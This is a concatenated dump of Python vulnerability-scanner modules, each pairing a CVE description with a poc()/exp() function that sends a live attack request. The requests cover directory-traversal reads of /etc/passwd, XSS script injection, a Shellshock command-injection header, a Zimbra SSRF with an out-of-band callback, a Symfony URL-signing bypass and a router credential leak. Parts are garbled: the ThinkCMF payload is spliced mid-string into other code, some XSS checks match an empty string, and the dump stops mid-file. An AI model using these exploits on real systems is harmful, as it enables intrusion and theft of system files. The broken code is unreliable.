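        # Network errors are reported as "not vulnerable"; KeyboardInterrupt still propagates.
        result["success"] = False

    return result


# Exploit, can be same with poc()
def exp(url):
    """Exploit entry point; identical to ``poc`` (reads /etc/passwd as proof only)."""
    return poc(url)


# Utils
def format_url(url):
    """Normalise a target: trim whitespace, default to http://, drop trailing slashes."""
    url = url.strip()
    if not url.startswith(('http://', 'https://')):
        url = 'http://' + url
    url = url.rstrip('/')

    return url
# --------------------------------------------------------------------------------
# /modules/cves/2013/CVE-2013-5528.py:
# --------------------------------------------------------------------------------
import requests


# Vuln Base Info
def info():
    return {
        "author": "cckuailong",
        "name": '''Cisco Unified Communications Manager 7/8/9 - Directory Traversal''',
        "description": '''A directory traversal vulnerability in the Tomcat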
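administrative web interface in Cisco Unified Communications Manager allows remote authenticated users to read arbitrary files via directory traversal sequences in an unspecified input string, aka Bug ID CSCui78815''',
        "severity": "high",
        "references": [
            "https://www.exploit-db.com/exploits/40887",
            # Was linked to CVE-2014-3120 (an unrelated Elasticsearch issue); point the
            # NVD entry at the CVE this module actually declares in ``cve-id``.
            "https://nvd.nist.gov/vuln/detail/CVE-2013-5528"
        ],
        "classification": {
            "cvss-metrics": "",
            "cvss-score": "",
            "cve-id": "CVE-2013-5528",
            "cwe-id": ""
        },
        "metadata": {
            "vuln-target": "",
        },
        "tags": ["cve", "cve2013", "lfi", "cisco"],
    }


# Vendor Fingerprint
def fingerprint(url):
    """Vendor fingerprint hook; no check is implemented, every target is accepted."""
    return True


# Proof of Concept
def poc(url):
    """Read /etc/passwd via the CUCM ``bulkvivewfilecontents.do`` traversal (CVE-2013-5528).

    NOTE(review): the advisory text above says "remote authenticated users" but this
    request carries no session or credentials; an unauthenticated miss therefore does
    not prove the target is patched.

    Args:
        url: target base URL; ``format_url`` prepends ``http://`` if no scheme.

    Returns:
        dict with ``success`` always present; on a hit also ``info`` and ``payload``.
    """
    result = {"success": False}  # a verdict is always present, also on a miss
    try:
        url = format_url(url)
        path = '/ccmadmin/bulkvivewfilecontents.do?filetype=samplefile&fileName=../../../../../../../../../../../../../../../../etc/passwd'

        # TLS verification is intentionally off: scan targets are commonly self-signed.
        resp = requests.get(url + path, timeout=10, verify=False, allow_redirects=False)
        if resp.status_code == 200 and "root:" in resp.text:
            result["success"] = True
            result["info"] = info()
            result["payload"] = url + path

    except Exception:
        # Network errors are reported as "not vulnerable"; KeyboardInterrupt still propagates.
        result["success"] = False

    return result


# Exploit, can be same with poc()
def exp(url):
    """Exploit entry point; identical to ``poc`` (reads /etc/passwd as proof only)."""
    return poc(url)


# Utils
def format_url(url):
    """Normalise a target: trim whitespace, default to http://, drop trailing slashes."""
    url = url.strip()
    if not url.startswith(('http://', 'https://')):
        url = 'http://' + url
    url = url.rstrip('/')

    return url
# --------------------------------------------------------------------------------
# /modules/cves/2014/CVE-2014-9444.py:
# --------------------------------------------------------------------------------
import requests


# Vuln Base Info
def info():
    return {
        "author": "cckuailong",
        "name": '''Frontend Uploader <= 0.9.2 - Unauthenticated Cross-Site Scripting''',
        "description": '''The Frontend Uploader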
WordPress plugin prior to v.0.9.2 was affected by an unauthenticated Cross-Site Scripting security vulnerability.''', 10 | "severity": "medium", 11 | "references": [ 12 | "https://wpscan.com/vulnerability/f0739b1e-22dc-4ca6-ad83-a0e80228e3c7", 13 | "https://nvd.nist.gov/vuln/detail/CVE-2014-9444" 14 | ], 15 | "classification": { 16 | "cvss-metrics": "", 17 | "cvss-score": "", 18 | "cve-id": "CVE-2014-9444", 19 | "cwe-id": "" 20 | }, 21 | "metadata":{ 22 | "vuln-target": "", 23 | 24 | }, 25 | "tags": ["cve", "cve2014", "wordpress", "wp-plugin", "xss"], 26 | } 27 | 28 | 29 | # Vender Fingerprint 30 | def fingerprint(url): 31 | return True 32 | 33 | # Proof of Concept 34 | def poc(url): 35 | result = {} 36 | try: 37 | url = format_url(url) 38 | path = '/?page_id=0&&errors[fu-disallowed-mime-type][0][name]=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' 39 | 40 | resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) 41 | if resp.status_code == 200 and "" in resp.text and "text/html" in str(resp.headers): 42 | result["success"] = True 43 | result["info"] = info() 44 | result["payload"] = url+path 45 | 46 | except: 47 | result["success"] = False 48 | 49 | return result 50 | 51 | 52 | # Exploit, can be same with poc() 53 | def exp(url): 54 | return poc(url) 55 | 56 | 57 | # Utils 58 | def format_url(url): 59 | url = url.strip() 60 | if not ( url.startswith('http://') or url.startswith('https://') ): 61 | url = 'http://' + url 62 | url = url.rstrip('/') 63 | 64 | return url -------------------------------------------------------------------------------- /modules/cves/2015/CVE-2015-6544.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''iTop XSS''', 9 | "description": '''Cross-site scripting (XSS) vulnerability in application/dashboard.class.inc.php in Combodo iTop before 
2.2.0-2459 allows remote attackers to inject arbitrary web script or HTML via a dashboard title.''', 10 | "severity": "medium", 11 | "references": [ 12 | "https://nvd.nist.gov/vuln/detail/CVE-2015-6544" 13 | ], 14 | "classification": { 15 | "cvss-metrics": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", 16 | "cvss-score": "6.1", 17 | "cve-id": "CVE-2015-6544", 18 | "cwe-id": "CWE-79" 19 | }, 20 | "metadata":{ 21 | "vuln-target": "", 22 | 23 | }, 24 | "tags": ["cve", "cve2015", "xss", "itop"], 25 | } 26 | 27 | 28 | # Vender Fingerprint 29 | def fingerprint(url): 30 | return True 31 | 32 | # Proof of Concept 33 | def poc(url): 34 | result = {} 35 | try: 36 | url = format_url(url) 37 | path = '/pages/ajax.render.php?operation=render_dashboard&dashboard_id=1&layout_class=DashboardLayoutOneCol&title=%%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' 38 | 39 | resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) 40 | if resp.status_code == 200 and "" in resp.text and "text/html" in str(resp.headers): 41 | result["success"] = True 42 | result["info"] = info() 43 | result["payload"] = url+path 44 | 45 | except: 46 | result["success"] = False 47 | 48 | return result 49 | 50 | 51 | # Exploit, can be same with poc() 52 | def exp(url): 53 | return poc(url) 54 | 55 | 56 | # Utils 57 | def format_url(url): 58 | url = url.strip() 59 | if not ( url.startswith('http://') or url.startswith('https://') ): 60 | url = 'http://' + url 61 | url = url.rstrip('/') 62 | 63 | return url -------------------------------------------------------------------------------- /modules/cves/2015/CVE-2015-8399.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''Atlassian Confluence configuration files read''', 9 | "description": '''Atlassian Confluence before 5.8.17 allows remote authenticated users to read 
configuration files via the decoratorName parameter to (1) spaces/viewdefaultdecorator.action or (2) admin/viewdefaultdecorator.action.''', 10 | "severity": "medium", 11 | "references": [ 12 | "https://jira.atlassian.com/browse/CONFSERVER-39704?src=confmacro" 13 | ], 14 | "classification": { 15 | "cvss-metrics": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", 16 | "cvss-score": "4.3", 17 | "cve-id": "CVE-2015-8399", 18 | "cwe-id": "CWE-200" 19 | }, 20 | "metadata":{ 21 | "vuln-target": "", 22 | "shodan-query":'''http.component:"Atlassian Confluence"''' 23 | }, 24 | "tags": ["cve", "cve2015", "atlassian", "confluence"], 25 | } 26 | 27 | 28 | # Vender Fingerprint 29 | def fingerprint(url): 30 | return True 31 | 32 | # Proof of Concept 33 | def poc(url): 34 | result = {} 35 | try: 36 | url = format_url(url) 37 | path = '/spaces/viewdefaultdecorator.action?decoratorName' 38 | 39 | resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) 40 | if resp.status_code == 200 and "confluence-init.properties" in resp.text and "View Default Decorator" in resp.text: 41 | result["success"] = True 42 | result["info"] = info() 43 | result["payload"] = url+path 44 | 45 | except: 46 | result["success"] = False 47 | 48 | return result 49 | 50 | 51 | # Exploit, can be same with poc() 52 | def exp(url): 53 | return poc(url) 54 | 55 | 56 | # Utils 57 | def format_url(url): 58 | url = url.strip() 59 | if not ( url.startswith('http://') or url.startswith('https://') ): 60 | url = 'http://' + url 61 | url = url.rstrip('/') 62 | 63 | return url -------------------------------------------------------------------------------- /modules/cves/2015/CVE-2015-4050.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''ESI unauthorized access''', 9 | "description": '''FragmentListener in the HttpKernel component in Symfony 2.3.19 
through 2.3.28, 2.4.9 through 2.4.10, 2.5.4 through 2.5.11, and 2.6.0 through 2.6.7, when ESI or SSI support enabled, does not check if the _controller attribute is set, which allows remote attackers to bypass URL signing and security rules by including (1) no hash or (2) an invalid hash in a request to /_fragment.''', 10 | "severity": "high", 11 | "references": [ 12 | "https://symfony.com/blog/cve-2015-4050-esi-unauthorized-access", 13 | "https://nvd.nist.gov/vuln/detail/CVE-2015-4050" 14 | ], 15 | "classification": { 16 | "cvss-metrics": "", 17 | "cvss-score": "", 18 | "cve-id": "", 19 | "cwe-id": "" 20 | }, 21 | "metadata":{ 22 | "vuln-target": "", 23 | 24 | }, 25 | "tags": ["cve", "cve2015", "symfony", "rce"], 26 | } 27 | 28 | 29 | # Vender Fingerprint 30 | def fingerprint(url): 31 | return True 32 | 33 | # Proof of Concept 34 | def poc(url): 35 | result = {} 36 | try: 37 | url = format_url(url) 38 | path = '/_fragment?_path=_controller=phpcredits&flag=-1' 39 | 40 | resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) 41 | if resp.status_code == 200 and "PHP Credits" in resp.text: 42 | result["success"] = True 43 | result["info"] = info() 44 | result["payload"] = url+path 45 | 46 | except: 47 | result["success"] = False 48 | 49 | return result 50 | 51 | 52 | # Exploit, can be same with poc() 53 | def exp(url): 54 | return poc(url) 55 | 56 | 57 | # Utils 58 | def format_url(url): 59 | url = url.strip() 60 | if not ( url.startswith('http://') or url.startswith('https://') ): 61 | url = 'http://' + url 62 | url = url.rstrip('/') 63 | 64 | return url -------------------------------------------------------------------------------- /modules/cves/2020/CVE-2020-7796.py: -------------------------------------------------------------------------------- 1 | import requests 2 | from plugins.oob import verify_request, gen_oob_domain 3 | 4 | 5 | 6 | # Vuln Base Info 7 | def info(): 8 | return { 9 | "author": "cckuailong", 10 | "name": '''Zimbra 
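Collaboration Suite (ZCS) - SSRF''',
        "description": '''Zimbra Collaboration Suite (ZCS) before 8.8.15 Patch 7 allows SSRF when WebEx zimlet is installed and zimlet JSP is enabled.''',
        "severity": "critical",
        "references": [
            "https://www.adminxe.com/2183.html"
        ],
        "classification": {
            "cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "cvss-score": "",
            "cve-id": "CVE-2020-7796",
            "cwe-id": "CWE-918"
        },
        "metadata": {
            "vuln-target": "",
        },
        "tags": ["cve", "cve2020", "zimbra", "ssrf", "oast"],
    }


# Vendor Fingerprint
def fingerprint(url):
    """Vendor fingerprint hook; no check is implemented, every target is accepted."""
    return True


# Proof of Concept
def poc(url):
    """Trigger the WebEx zimlet SSRF (CVE-2020-7796) and confirm it out-of-band.

    ``companyId`` is pointed at a per-run OAST domain; the verdict comes solely from
    ``verify_request`` seeing the DNS lookup, never from the HTTP response.

    Args:
        url: target base URL; ``format_url`` prepends ``http://`` if no scheme.

    Returns:
        dict with ``success`` always present; on a confirmed callback also
        ``info`` and ``payload``.
    """
    result = {"success": False}  # a verdict is always present, also on a silent miss
    try:
        url = format_url(url)

        oob_domain, flag = gen_oob_domain()

        # The generated domain must be interpolated: the original string carried the
        # literal text "oob_domain", so the callback could never arrive and the module
        # reported every target as not vulnerable.
        path = """/zimlet/com_zimbra_webex/httpPost.jsp?companyId=http://{oob_domain}%23""".format(oob_domain=oob_domain)
        method = "GET"
        data = """"""
        headers = {}
        # TLS verification is intentionally off: scan targets are commonly self-signed.
        # The response body is irrelevant here, only the OAST callback counts.
        requests.request(method=method, url=url + path, data=data, headers=headers,
                         timeout=10, verify=False, allow_redirects=False)

        if verify_request(type="dns", flag=flag):
            result["success"] = True
            result["info"] = info()
            result["payload"] = url + path

    except Exception:
        # Network/OAST errors are reported as "not vulnerable"; KeyboardInterrupt still propagates.
        result["success"] = False

    return result


# Exploit, can be same with poc()
def exp(url):
    """Exploit entry point; identical to ``poc`` (callback proof only)."""
    return poc(url)


# Utils
def format_url(url):
    """Normalise a target: trim whitespace, default to http://, drop trailing slashes."""
    url = url.strip()
    if not url.startswith(('http://', 'https://')):
        url = 'http://' + url
    url = url.rstrip('/')

    return url
# --------------------------------------------------------------------------------
# /modules/cves/2013/CVE-2013-5979.py:
# --------------------------------------------------------------------------------
import requests


# Vuln Base Info
def info():
    return {
        "author": "cckuailong",
        "name": '''Xibo 1.2.2/1.4.1 - Directory Traversal''',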
"description": '''A directory traversal vulnerability in Spring Signage Xibo 1.2.x before 1.2.3 and 1.4.x before 1.4.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the p parameter to index.php.''', 10 | "severity": "high", 11 | "references": [ 12 | "https://www.exploit-db.com/exploits/26955", 13 | "https://nvd.nist.gov/vuln/detail/CVE-2013-5979", 14 | "https://www.cvedetails.com/cve/CVE-2013-5979", 15 | "https://bugs.launchpad.net/xibo/+bug/1093967" 16 | ], 17 | "classification": { 18 | "cvss-metrics": "", 19 | "cvss-score": "", 20 | "cve-id": "CVE-2013-5979", 21 | "cwe-id": "" 22 | }, 23 | "metadata":{ 24 | "vuln-target": "", 25 | 26 | }, 27 | "tags": ["cve", "cve2013", "lfi"], 28 | } 29 | 30 | 31 | # Vender Fingerprint 32 | def fingerprint(url): 33 | return True 34 | 35 | # Proof of Concept 36 | def poc(url): 37 | result = {} 38 | try: 39 | url = format_url(url) 40 | path = '/index.php?p=../../../../../../../../../../../../../../../../etc/passwd%00index&q=About&ajax=true&_=1355714673828' 41 | 42 | resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) 43 | if resp.status_code == 200 and "root:" in resp.text: 44 | result["success"] = True 45 | result["info"] = info() 46 | result["payload"] = url+path 47 | 48 | except: 49 | result["success"] = False 50 | 51 | return result 52 | 53 | 54 | # Exploit, can be same with poc() 55 | def exp(url): 56 | return poc(url) 57 | 58 | 59 | # Utils 60 | def format_url(url): 61 | url = url.strip() 62 | if not ( url.startswith('http://') or url.startswith('https://') ): 63 | url = 'http://' + url 64 | url = url.rstrip('/') 65 | 66 | return url -------------------------------------------------------------------------------- /modules/cves/2018/CVE-2018-7719.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''Acrolinx Server Directory 
Traversal''', 9 | "description": '''Acrolinux Server versions prior to 5.2.5 suffer from a directory traversal vulnerability.''', 10 | "severity": "high", 11 | "references": [ 12 | "https://packetstormsecurity.com/files/146911/Acrolinx-Server-Directory-Traversal.html", 13 | "https://www.cvedetails.com/cve/CVE-2018-7719" 14 | ], 15 | "classification": { 16 | "cvss-metrics": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", 17 | "cvss-score": "", 18 | "cve-id": "CVE-2018-7719", 19 | "cwe-id": "CWE-22" 20 | }, 21 | "metadata":{ 22 | "vuln-target": "", 23 | 24 | }, 25 | "tags": ["cve", "cve2018", "acrolinx", "lfi"], 26 | } 27 | 28 | 29 | # Vender Fingerprint 30 | def fingerprint(url): 31 | return True 32 | 33 | # Proof of Concept 34 | def poc(url): 35 | result = {} 36 | try: 37 | url = format_url(url) 38 | 39 | path = """/..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini""" 40 | method = "GET" 41 | data = """""" 42 | headers = {} 43 | resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False) 44 | 45 | if ("""bit app support""" in resp0.text and """fonts""" in resp0.text and """extensions""" in resp0.text): 46 | result["success"] = True 47 | result["info"] = info() 48 | result["payload"] = url+path 49 | 50 | except: 51 | result["success"] = False 52 | 53 | return result 54 | 55 | 56 | # Exploit, can be same with poc() 57 | def exp(url): 58 | return poc(url) 59 | 60 | 61 | # Utils 62 | def format_url(url): 63 | url = url.strip() 64 | if not ( url.startswith('http://') or url.startswith('https://') ): 65 | url = 'http://' + url 66 | url = url.rstrip('/') 67 | 68 | return url -------------------------------------------------------------------------------- /modules/cves/2013/CVE-2013-4117.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": 
'''WordPress Plugin Category Grid View Gallery 2.3.1 - Reflected Cross-Site Scripting''', 9 | "description": '''A cross-site scripting vulnerability in includes/CatGridPost.php in the Category Grid View Gallery plugin 2.3.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the ID parameter.''', 10 | "severity": "medium", 11 | "references": [ 12 | "https://nvd.nist.gov/vuln/detail/CVE-2013-4117" 13 | ], 14 | "classification": { 15 | "cvss-metrics": "", 16 | "cvss-score": "", 17 | "cve-id": "CVE-2013-4117", 18 | "cwe-id": "" 19 | }, 20 | "metadata":{ 21 | "vuln-target": "", 22 | 23 | }, 24 | "tags": ["cve", "cve2013", "wordpress", "xss", "wp-plugin"], 25 | } 26 | 27 | 28 | # Vender Fingerprint 29 | def fingerprint(url): 30 | return True 31 | 32 | # Proof of Concept 33 | def poc(url): 34 | result = {} 35 | try: 36 | url = format_url(url) 37 | path = '/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php?ID=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' 38 | 39 | resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) 40 | if resp.status_code == 200 and "" in resp.text and "text/html" in str(resp.headers['content-type']): 41 | result["success"] = True 42 | result["info"] = info() 43 | result["payload"] = url+path 44 | 45 | except: 46 | result["success"] = False 47 | 48 | return result 49 | 50 | 51 | # Exploit, can be same with poc() 52 | def exp(url): 53 | return poc(url) 54 | 55 | 56 | # Utils 57 | def format_url(url): 58 | url = url.strip() 59 | if not ( url.startswith('http://') or url.startswith('https://') ): 60 | url = 'http://' + url 61 | url = url.rstrip('/') 62 | 63 | return url -------------------------------------------------------------------------------- /modules/vulnerabilities/other/visual-tools-dvr-rce.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | 
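return {
        "author": "cckuailong",
        "name": '''Visual Tools DVR VX16 4.2.28.0 - OS Command Injection (Unauthenticated)''',
        # NOTE(review): "authenticated" here contradicts the title and the request below,
        # which sends no credentials; confirm which wording the reference supports.
        "description": '''vulnerabilities in the web-based management interface of Visual Tools DVR VX16 4.2.28.0 could allow an authenticated, remote attacker to perform command injection attacks against an affected device.''',
        "severity": "critical",
        "references": [
            "https://www.exploit-db.com/exploits/50098"
        ],
        "classification": {
            "cvss-metrics": "",
            "cvss-score": "",
            "cve-id": "",
            "cwe-id": ""
        },
        "metadata": {
            "vuln-target": "",
        },
        "tags": ["visualtools", "rce", "oast", "injection"],
    }


# Vendor Fingerprint
def fingerprint(url):
    """Vendor fingerprint hook; no check is implemented, every target is accepted."""
    return True


# Proof of Concept
def poc(url):
    """Probe ``/cgi-bin/slogin/login.py`` for Shellshock-style injection via User-Agent.

    The User-Agent carries a Bash function definition followed by ``cat /etc/passwd``;
    a root passwd entry in a 200 response is the proof. Despite the "oast" tag, this
    check is in-band: no callback domain is involved.

    Args:
        url: target base URL; ``format_url`` prepends ``http://`` if no scheme.

    Returns:
        dict with ``success`` always present; on a hit also ``info`` and ``payload``.
    """
    # Function-scope import: this module only imports ``requests`` at file level, so the
    # ``re.search`` below raised NameError and the bare except silently reported
    # "not vulnerable" for every target.
    import re

    result = {"success": False}  # a verdict is always present, also on a miss
    try:
        url = format_url(url)

        path = """/cgi-bin/slogin/login.py"""
        method = "GET"
        data = """"""
        headers = {'Accept': '*/*', 'User-Agent': '() { :; }; echo ; echo ; /bin/cat /etc/passwd'}
        # TLS verification is intentionally off: scan targets are commonly self-signed.
        resp0 = requests.request(method=method, url=url + path, data=data, headers=headers,
                                 timeout=10, verify=False, allow_redirects=False)

        if (re.search(r"""root:.*:0:0""", resp0.text)) and (resp0.status_code == 200):
            result["success"] = True
            result["info"] = info()
            result["payload"] = url + path

    except Exception:
        # Network errors are reported as "not vulnerable"; KeyboardInterrupt still propagates.
        result["success"] = False

    return result


# Exploit, can be same with poc()
def exp(url):
    """Exploit entry point; identical to ``poc`` (reads /etc/passwd as proof only)."""
    return poc(url)


# Utils
def format_url(url):
    """Normalise a target: trim whitespace, default to http://, drop trailing slashes."""
    url = url.strip()
    if not url.startswith(('http://', 'https://')):
        url = 'http://' + url
    url = url.rstrip('/')

    return url
# --------------------------------------------------------------------------------
# /modules/vulnerabilities/thinkcmf/thinkcmf-rce.py:
# --------------------------------------------------------------------------------
import requests

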
| # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''ThinkCMF RCE''', 9 | "description": '''''', 10 | "severity": "critical", 11 | "references": [ 12 | "https://www.freebuf.com/vuls/217586.html" 13 | ], 14 | "classification": { 15 | "cvss-metrics": "", 16 | "cvss-score": "", 17 | "cve-id": "", 18 | "cwe-id": "" 19 | }, 20 | "metadata":{ 21 | "vuln-target": "", 22 | 23 | }, 24 | "tags": ["thinkcmf", "rce"], 25 | } 26 | 27 | 28 | # Vender Fingerprint 29 | def fingerprint(url): 30 | return True 31 | 32 | # Proof of Concept 33 | def poc(url): 34 | result = {} 35 | try: 36 | url = format_url(url) 37 | 38 | path = """/index.php?a=fetch&content={{url_encode(\'' in resp.text and "text/html" in str(resp.headers): 42 | result["success"] = True 43 | result["info"] = info() 44 | result["payload"] = url+path 45 | 46 | except: 47 | result["success"] = False 48 | 49 | return result 50 | 51 | 52 | # Exploit, can be same with poc() 53 | def exp(url): 54 | return poc(url) 55 | 56 | 57 | # Utils 58 | def format_url(url): 59 | url = url.strip() 60 | if not ( url.startswith('http://') or url.startswith('https://') ): 61 | url = 'http://' + url 62 | url = url.rstrip('/') 63 | 64 | return url -------------------------------------------------------------------------------- /modules/cves/2015/CVE-2015-5471.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''Swim Team <= v1.44.10777 - Local File Inclusion''', 9 | "description": '''The program /wp-swimteam/include/user/download.php allows unauthenticated attackers to retrieve arbitrary files from the system.''', 10 | "severity": "medium", 11 | "references": [ 12 | "https://wpscan.com/vulnerability/b00d9dda-721d-4204-8995-093f695c3568", 13 | "http://www.vapid.dhs.org/advisory.php?v=134", 14 | "https://nvd.nist.gov/vuln/detail/CVE-2015-5471" 15 | ], 16 | 
"classification": { 17 | "cvss-metrics": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", 18 | "cvss-score": "5.3", 19 | "cve-id": "CVE-2015-5471", 20 | "cwe-id": "CWE-22" 21 | }, 22 | "metadata":{ 23 | "vuln-target": "", 24 | 25 | }, 26 | "tags": ["cve", "cve2015", "wordpress", "wp-plugin", "lfi"], 27 | } 28 | 29 | 30 | # Vender Fingerprint 31 | def fingerprint(url): 32 | return True 33 | 34 | # Proof of Concept 35 | def poc(url): 36 | result = {} 37 | try: 38 | url = format_url(url) 39 | path = '/wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename=/etc/passwd&contenttype=text/html&transient=1&abspath=/usr/share/wordpress' 40 | 41 | resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) 42 | if resp.status_code == 200 and "root:" in resp.text: 43 | result["success"] = True 44 | result["info"] = info() 45 | result["payload"] = url+path 46 | 47 | except: 48 | result["success"] = False 49 | 50 | return result 51 | 52 | 53 | # Exploit, can be same with poc() 54 | def exp(url): 55 | return poc(url) 56 | 57 | 58 | # Utils 59 | def format_url(url): 60 | url = url.strip() 61 | if not ( url.startswith('http://') or url.startswith('https://') ): 62 | url = 'http://' + url 63 | url = url.rstrip('/') 64 | 65 | return url -------------------------------------------------------------------------------- /modules/vulnerabilities/other/vanguard-post-xss.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''Vanguard Marketplace CMS ≤ 2.1''', 9 | "description": '''Persistent Cross-site Scripting in message & product title-tags also there's Non-Persistent Cross-site scripting in product search box''', 10 | "severity": "medium", 11 | "references": [ 12 | "https://packetstormsecurity.com/files/157099/Vanguard-2.1-Cross-Site-Scripting.html" 13 | ], 14 | "classification": { 15 | 
"cvss-metrics": "", 16 | "cvss-score": "", 17 | "cve-id": "", 18 | "cwe-id": "" 19 | }, 20 | "metadata":{ 21 | "vuln-target": "", 22 | 23 | }, 24 | "tags": ["vanguard", "xss"], 25 | } 26 | 27 | 28 | # Vender Fingerprint 29 | def fingerprint(url): 30 | return True 31 | 32 | # Proof of Concept 33 | def poc(url): 34 | result = {} 35 | try: 36 | url = format_url(url) 37 | 38 | path = """/search""" 39 | method = "POST" 40 | data = """phps_query=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E""" 41 | headers = {'Content-Type': 'application/x-www-form-urlencoded'} 42 | resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False) 43 | 44 | if ("""""" in resp0.text) and ("""text/html""" in str(resp0.headers)) and (resp0.status_code == 200): 45 | result["success"] = True 46 | result["info"] = info() 47 | result["payload"] = url+path 48 | 49 | except: 50 | result["success"] = False 51 | 52 | return result 53 | 54 | 55 | # Exploit, can be same with poc() 56 | def exp(url): 57 | return poc(url) 58 | 59 | 60 | # Utils 61 | def format_url(url): 62 | url = url.strip() 63 | if not ( url.startswith('http://') or url.startswith('https://') ): 64 | url = 'http://' + url 65 | url = url.rstrip('/') 66 | 67 | return url -------------------------------------------------------------------------------- /modules/cves/2015/CVE-2015-0554.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''Pirelli ADSL2/2+ Wireless Router P.DGA4001N - Information Disclosure''', 9 | "description": '''The ADB (formerly Pirelli Broadband Solutions) P.DGA4001N router with firmware PDG_TEF_SP_4.06L.6 does not properly restrict access to the web interface, which allows remote attackers to obtain sensitive information or cause a denial of service (device restart) as demonstrated by a 
direct request to (1) wlsecurity.html or (2) resetrouter.html.''', 10 | "severity": "high", 11 | "references": [ 12 | "https://www.exploit-db.com/exploits/35721", 13 | "https://nvd.nist.gov/vuln/detail/CVE-2015-0554" 14 | ], 15 | "classification": { 16 | "cvss-metrics": "", 17 | "cvss-score": "", 18 | "cve-id": "", 19 | "cwe-id": "" 20 | }, 21 | "metadata":{ 22 | "vuln-target": "", 23 | 24 | }, 25 | "tags": ["cve", "cve2015", "pirelli", "router", "disclosure"], 26 | } 27 | 28 | 29 | # Vender Fingerprint 30 | def fingerprint(url): 31 | return True 32 | 33 | # Proof of Concept 34 | def poc(url): 35 | result = {} 36 | try: 37 | url = format_url(url) 38 | path = '/wlsecurity.html' 39 | 40 | resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) 41 | if resp.status_code == 200 and "var wpapskkey" in resp.text and "var WscDevPin" in resp.text and "var sessionkey" in resp.text: 42 | result["success"] = True 43 | result["info"] = info() 44 | result["payload"] = url+path 45 | 46 | except: 47 | result["success"] = False 48 | 49 | return result 50 | 51 | 52 | # Exploit, can be same with poc() 53 | def exp(url): 54 | return poc(url) 55 | 56 | 57 | # Utils 58 | def format_url(url): 59 | url = url.strip() 60 | if not ( url.startswith('http://') or url.startswith('https://') ): 61 | url = 'http://' + url 62 | url = url.rstrip('/') 63 | 64 | return url -------------------------------------------------------------------------------- /modules/vulnerabilities/other/sonicwall-sslvpn-shellshock.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''Sonicwall SSLVPN ShellShock RCE''', 9 | "description": '''A vulnerability in Sonicwall SSLVPN contains a 'ShellShock' vulnerability which allows remote unauthenticated attackers to execute arbitrary commands.''', 10 | "severity": "critical", 11 | "references": [ 12 | 
